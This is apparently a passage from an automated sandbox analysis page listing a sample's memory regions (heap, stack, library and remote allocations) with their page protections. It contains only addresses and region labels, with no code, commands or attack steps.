page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
5940000
|
unkown
|
page read and write
|
||
|
504D000
|
direct allocation
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
B498B7E000
|
unkown
|
page readonly
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
4C34000
|
heap
|
page read and write
|
||
|
34F9000
|
heap
|
page read and write
|
||
|
27E3000
|
heap
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
FDB000
|
heap
|
page read and write
|
||
|
581E000
|
stack
|
page read and write
|
||
|
DD4000
|
heap
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
20619C2B000
|
heap
|
page read and write
|
||
|
2BB7000
|
unkown
|
page read and write
|
||
|
2CDF000
|
stack
|
page read and write
|
||
|
29A7000
|
heap
|
page read and write
|
||
|
8BF000
|
stack
|
page read and write
|
||
|
2061A3D0000
|
trusted library allocation
|
page read and write
|
||
|
2E1F000
|
stack
|
page read and write
|
||
|
3EE6000
|
unkown
|
page read and write
|
||
|
F48000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
6FA71000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2061F287000
|
heap
|
page read and write
|
||
|
B499AFE000
|
stack
|
page read and write
|
||
|
E54000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
E26000
|
heap
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
3347000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2BB7000
|
unkown
|
page read and write
|
||
|
B4998FE000
|
stack
|
page read and write
|
||
|
2998000
|
heap
|
page read and write
|
||
|
2061F0D0000
|
trusted library allocation
|
page read and write
|
||
|
CF6000
|
heap
|
page read and write
|
||
|
20619B60000
|
trusted library section
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
1F7D7940000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
2061F000000
|
trusted library allocation
|
page read and write
|
||
|
591F000
|
stack
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
1F7D7950000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
102F000
|
stack
|
page read and write
|
||
|
38A4000
|
unkown
|
page read and write
|
||
|
2061AA60000
|
trusted library section
|
page readonly
|
||
|
B498E7B000
|
stack
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
258D000
|
heap
|
page read and write
|
||
|
E54000
|
heap
|
page read and write
|
||
|
B499E7E000
|
unkown
|
page readonly
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
6FAF1000
|
unkown
|
page read and write
|
||
|
51F000
|
heap
|
page read and write
|
||
|
79C000
|
stack
|
page read and write
|
||
|
2F4B000
|
stack
|
page read and write
|
||
|
118F000
|
stack
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
1F7D7A21000
|
heap
|
page read and write
|
||
|
B4990FE000
|
stack
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
2FA0000
|
unkown
|
page readonly
|
||
|
EE0000
|
heap
|
page read and write
|
||
|
2061F05E000
|
trusted library allocation
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
516E000
|
direct allocation
|
page read and write
|
||
|
4FBD000
|
direct allocation
|
page read and write
|
||
|
2061F170000
|
trusted library allocation
|
page read and write
|
||
|
1F7D7AB4000
|
heap
|
page read and write
|
||
|
2061AA70000
|
trusted library section
|
page readonly
|
||
|
4EA000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
20619C3F000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
B49A07E000
|
unkown
|
page readonly
|
||
|
4BED000
|
direct allocation
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2061A3E0000
|
trusted library allocation
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
29A6000
|
heap
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
2A30000
|
unkown
|
page readonly
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
8D5000
|
heap
|
page read and write
|
||
|
1F7D7A5A000
|
heap
|
page read and write
|
||
|
4E98000
|
trusted library allocation
|
page read and write
|
||
|
DD4000
|
heap
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
2061A513000
|
heap
|
page read and write
|
||
|
2061F200000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
1F7D7A75000
|
heap
|
page read and write
|
||
|
B4991FE000
|
stack
|
page read and write
|
||
|
29CF000
|
unkown
|
page read and write
|
||
|
2A44000
|
unkown
|
page read and write
|
||
|
471000
|
unkown
|
page write copy
|
||
|
20619D13000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
278F000
|
heap
|
page read and write
|
||
|
F93000
|
heap
|
page read and write
|
||
|
471000
|
unkown
|
page write copy
|
||
|
CF6000
|
heap
|
page read and write
|
||
|
2061F28C000
|
heap
|
page read and write
|
||
|
3FC0000
|
unkown
|
page read and write
|
||
|
2335000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2061F000000
|
trusted library allocation
|
page read and write
|
||
|
2D90000
|
unkown
|
page read and write
|
||
|
50FD000
|
direct allocation
|
page read and write
|
||
|
2977000
|
heap
|
page read and write
|
||
|
2061F130000
|
trusted library allocation
|
page read and write
|
||
|
2BB7000
|
unkown
|
page read and write
|
||
|
35C3000
|
heap
|
page read and write
|
||
|
4214000
|
unkown
|
page read and write
|
||
|
20619C8F000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
8C8000
|
unkown
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
CF6000
|
heap
|
page read and write
|
||
|
4E81000
|
unkown
|
page read and write
|
||
|
FA4000
|
heap
|
page read and write
|
||
|
577F000
|
stack
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
B49917E000
|
unkown
|
page readonly
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
2061AA90000
|
trusted library section
|
page readonly
|
||
|
D50000
|
heap
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
5467000
|
heap
|
page read and write
|
||
|
B49A17E000
|
stack
|
page read and write
|
||
|
20619D02000
|
heap
|
page read and write
|
||
|
2061F218000
|
heap
|
page read and write
|
||
|
4ADA000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
E54000
|
heap
|
page read and write
|
||
|
DD4000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
2AC7000
|
heap
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
2FFD000
|
unkown
|
page read and write
|
||
|
B49867E000
|
unkown
|
page readonly
|
||
|
2A50000
|
unkown
|
page readonly
|
||
|
E26000
|
heap
|
page read and write
|
||
|
281E000
|
stack
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
53A0000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
35D1000
|
heap
|
page read and write
|
||
|
98B000
|
unkown
|
page readonly
|
||
|
400000
|
unkown
|
page readonly
|
||
|
B49987E000
|
unkown
|
page readonly
|
||
|
4A87000
|
heap
|
page read and write
|
||
|
D8E000
|
stack
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
DD4000
|
heap
|
page read and write
|
||
|
6FA41000
|
unkown
|
page execute read
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
4E80000
|
unkown
|
page read and write
|
||
|
32F3000
|
heap
|
page read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
2061F21F000
|
heap
|
page read and write
|
||
|
B49957E000
|
unkown
|
page readonly
|
||
|
2061F0E0000
|
trusted library allocation
|
page read and write
|
||
|
D9E000
|
stack
|
page read and write
|
||
|
20619C7A000
|
heap
|
page read and write
|
||
|
32D2000
|
heap
|
page read and write
|
||
|
2370000
|
heap
|
page read and write
|
||
|
2061F030000
|
trusted library allocation
|
page read and write
|
||
|
41CB000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
B499C7E000
|
unkown
|
page readonly
|
||
|
5A2D000
|
direct allocation
|
page read and write
|
||
|
378F000
|
unkown
|
page read and write
|
||
|
FFD000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2A40000
|
unkown
|
page readonly
|
||
|
2335000
|
unkown
|
page read and write
|
||
|
E26000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
35B1000
|
heap
|
page read and write
|
||
|
CB8000
|
heap
|
page read and write
|
||
|
2D3C000
|
stack
|
page read and write
|
||
|
4BE9000
|
direct allocation
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2061AA50000
|
trusted library section
|
page readonly
|
||
|
50F9000
|
direct allocation
|
page read and write
|
||
|
2A1B000
|
heap
|
page read and write
|
||
|
6FAC0000
|
unkown
|
page readonly
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
A5F9FE000
|
stack
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
4B56000
|
heap
|
page read and write
|
||
|
6C541000
|
unkown
|
page read and write
|
||
|
2061F160000
|
trusted library allocation
|
page read and write
|
||
|
2330000
|
heap
|
page read and write
|
||
|
2061A400000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
D7D000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2061A940000
|
trusted library allocation
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
E54000
|
heap
|
page read and write
|
||
|
32ED000
|
heap
|
page read and write
|
||
|
2360000
|
unkown
|
page readonly
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
20619A40000
|
heap
|
page read and write
|
||
|
2F5C000
|
stack
|
page read and write
|
||
|
2BB7000
|
unkown
|
page read and write
|
||
|
543000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
2061F001000
|
trusted library allocation
|
page read and write
|
||
|
20619C72000
|
heap
|
page read and write
|
||
|
2D7D000
|
stack
|
page read and write
|
||
|
2061F044000
|
trusted library allocation
|
page read and write
|
||
|
5A29000
|
direct allocation
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
F9F000
|
heap
|
page read and write
|
||
|
2061F22C000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
1F7D7970000
|
heap
|
page read and write
|
||
|
4D5D000
|
trusted library allocation
|
page read and write
|
||
|
111F000
|
stack
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
20619A20000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
23FE000
|
unkown
|
page read and write
|
||
|
6FA68000
|
unkown
|
page readonly
|
||
|
C80000
|
heap
|
page read and write
|
||
|
B49897E000
|
unkown
|
page readonly
|
||
|
2061F24C000
|
heap
|
page read and write
|
||
|
32FA000
|
stack
|
page read and write
|
||
|
2335000
|
unkown
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2981000
|
heap
|
page read and write
|
||
|
2061A601000
|
trusted library allocation
|
page read and write
|
||
|
B49A27E000
|
unkown
|
page readonly
|
||
|
2061EFF0000
|
trusted library allocation
|
page read and write
|
||
|
29AB000
|
heap
|
page read and write
|
||
|
20619BE1000
|
trusted library allocation
|
page read and write
|
||
|
6C538000
|
unkown
|
page readonly
|
||
|
3632000
|
heap
|
page read and write
|
||
|
20619B20000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
6FAF5000
|
unkown
|
page read and write
|
||
|
D1F000
|
heap
|
page read and write
|
||
|
482000
|
unkown
|
page write copy
|
||
|
3D4B000
|
unkown
|
page read and write
|
||
|
26D0000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
4B90000
|
heap
|
page read and write
|
||
|
2F6E000
|
unkown
|
page read and write
|
||
|
1F7D7A46000
|
heap
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
29FA000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
E26000
|
heap
|
page read and write
|
||
|
4EB5000
|
trusted library allocation
|
page read and write
|
||
|
6FA79000
|
unkown
|
page readonly
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
DC8000
|
heap
|
page read and write
|
||
|
B498A7C000
|
stack
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
20619C94000
|
heap
|
page read and write
|
||
|
2F90000
|
unkown
|
page readonly
|
||
|
2061AFA0000
|
trusted library allocation
|
page read and write
|
||
|
3870000
|
heap
|
page read and write
|
||
|
563E000
|
unkown
|
page read and write
|
||
|
A5F5FF000
|
stack
|
page read and write
|
||
|
B49907E000
|
unkown
|
page readonly
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
4E90000
|
direct allocation
|
page read and write
|
||
|
3C59000
|
trusted library allocation
|
page read and write
|
||
|
4626000
|
heap
|
page read and write
|
||
|
417000
|
unkown
|
page execute read
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2061F1A0000
|
remote allocation
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
3E1A000
|
unkown
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
DEE000
|
stack
|
page read and write
|
||
|
A5F7F7000
|
stack
|
page read and write
|
||
|
287D000
|
heap
|
page read and write
|
||
|
432000
|
unkown
|
page readonly
|
||
|
2061F23F000
|
heap
|
page read and write
|
||
|
471000
|
unkown
|
page write copy
|
||
|
B498C7C000
|
stack
|
page read and write
|
||
|
3CCE000
|
trusted library allocation
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
20619C9F000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
20619CB0000
|
heap
|
page read and write
|
||
|
413000
|
unkown
|
page readonly
|
||
|
29FC000
|
heap
|
page read and write
|
||
|
2980000
|
heap
|
page read and write
|
||
|
3F65000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
4F20000
|
direct allocation
|
page read and write
|
||
|
1F7D9440000
|
heap
|
page read and write
|
||
|
1F7D7A5E000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
2A7C000
|
heap
|
page read and write
|
||
|
387B000
|
unkown
|
page read and write
|
||
|
29F8000
|
heap
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
6FA40000
|
unkown
|
page readonly
|
||
|
1F7D79BE000
|
heap
|
page read and write
|
||
|
348B000
|
heap
|
page read and write
|
||
|
4749000
|
heap
|
page read and write
|
||
|
339E000
|
heap
|
page read and write
|
||
|
2061F257000
|
heap
|
page read and write
|
||
|
5CB1000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
3E04000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2061F150000
|
trusted library allocation
|
page read and write
|
||
|
DD4000
|
heap
|
page read and write
|
||
|
B49967E000
|
unkown
|
page readonly
|
||
|
2E10000
|
direct allocation
|
page read and write
|
||
|
2BB8000
|
heap
|
page read and write
|
||
|
3FB0000
|
unkown
|
page read and write
|
||
|
CF6000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
29A9000
|
heap
|
page read and write
|
||
|
2F90000
|
unkown
|
page read and write
|
||
|
2430000
|
direct allocation
|
page read and write
|
||
|
482000
|
unkown
|
page write copy
|
||
|
6FAF5000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2061F1A0000
|
remote allocation
|
page read and write
|
||
|
478000
|
unkown
|
page readonly
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
2D1E000
|
stack
|
page read and write
|
||
|
5049000
|
direct allocation
|
page read and write
|
||
|
E23000
|
heap
|
page read and write
|
||
|
CF6000
|
heap
|
page read and write
|
||
|
5CB0000
|
unkown
|
page read and write
|
||
|
2061F570000
|
trusted library allocation
|
page read and write
|
||
|
5119000
|
direct allocation
|
page read and write
|
||
|
2061F271000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
3EF0000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
1F7D7A75000
|
heap
|
page read and write
|
||
|
553E000
|
unkown
|
page read and write
|
||
|
B499F7D000
|
stack
|
page read and write
|
||
|
20619B50000
|
trusted library allocation
|
page read and write
|
||
|
2979000
|
heap
|
page read and write
|
||
|
23BE000
|
unkown
|
page read and write
|
||
|
2981000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
2061F040000
|
trusted library allocation
|
page read and write
|
||
|
B49947E000
|
unkown
|
page readonly
|
||
|
8A2000
|
unkown
|
page read and write
|
||
|
34D1000
|
heap
|
page read and write
|
||
|
B49937E000
|
stack
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
B498D7E000
|
unkown
|
page readonly
|
||
|
1039000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
29D0000
|
unkown
|
page read and write
|
||
|
4982000
|
trusted library allocation
|
page read and write
|
||
|
D22000
|
heap
|
page read and write
|
||
|
27FA000
|
heap
|
page read and write
|
||
|
20619C77000
|
heap
|
page read and write
|
||
|
2061F297000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2581000
|
heap
|
page read and write
|
||
|
1001000
|
heap
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
2061F253000
|
heap
|
page read and write
|
||
|
2A40000
|
unkown
|
page read and write
|
||
|
49B7000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2CE8000
|
heap
|
page read and write
|
||
|
B497FBB000
|
stack
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
There are 753 hidden memdumps, click here to show them.